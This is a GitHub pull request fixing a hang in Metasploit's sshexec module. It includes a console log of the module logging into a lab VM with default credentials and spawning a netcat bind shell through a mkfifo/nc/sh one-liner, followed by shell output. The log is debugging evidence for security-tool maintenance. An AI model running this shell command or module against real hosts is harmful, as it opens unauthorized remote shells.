Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix sshexec hanging on exec! and blocking close #12025

Merged
merged 1 commit into from Jun 28, 2019

Conversation

Projects
None yet
3 participants
@wvu-r7
Copy link
Contributor

commented Jun 28, 2019

This may fix most of the troubling behavior we've seen in this module.

msf5 > use sshexec

Matching Modules
================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  exploit/multi/ssh/sshexec  1999-01-01       manual  No     SSH User Code Execution


[*] Using exploit/multi/ssh/sshexec
msf5 exploit(multi/ssh/sshexec) > set rhosts 172.28.128.3
rhosts => 172.28.128.3
msf5 exploit(multi/ssh/sshexec) > set username vagrant
username => vagrant
msf5 exploit(multi/ssh/sshexec) > set password vagrant
password => vagrant
msf5 exploit(multi/ssh/sshexec) > set target Unix\ Cmd
target => Unix Cmd
msf5 exploit(multi/ssh/sshexec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf5 exploit(multi/ssh/sshexec) > run

[*] 172.28.128.3:22 - Sending stager...
[*] Executing mkfifo /tmp/ixylsf; (nc -l -p 4444 ||nc -l 4444)0</tmp/ixylsf | /bin/sh >/tmp/ixylsf 2>&1; rm /tmp/ixylsf
[!] Timed out while waiting for command to return
[*] Started bind TCP handler against 172.28.128.3:4444
[*] Command shell session 1 opened (172.28.128.1:64639 -> 172.28.128.3:4444) at 2019-06-27 22:14:19 -0500

id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Fixes #12021, in a cheap way.

@wvu-r7 wvu-r7 added module bug labels Jun 28, 2019

@wvu-r7 wvu-r7 requested review from bwatters-r7 and asoto-r7 Jun 28, 2019

@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 28, 2019

This makes sense and it works to resolve the issue. As a bonus, I appreciate the code tidying! 😄

@asoto-r7 asoto-r7 merged commit 7a26e1c into rapid7:master Jun 28, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

asoto-r7 added a commit that referenced this pull request Jun 28, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 28, 2019

@wvu-r7 wvu-r7 deleted the wvu-r7:bug/ssh branch Jun 28, 2019

@pbarry-r7

This comment has been minimized.

Copy link
Contributor

commented Jul 5, 2019

Release Notes

This PR adds fixes to sshexec related to hanging on exec! and blocking close.

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

commented Jul 5, 2019

Thanks, @pbarry-r7!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.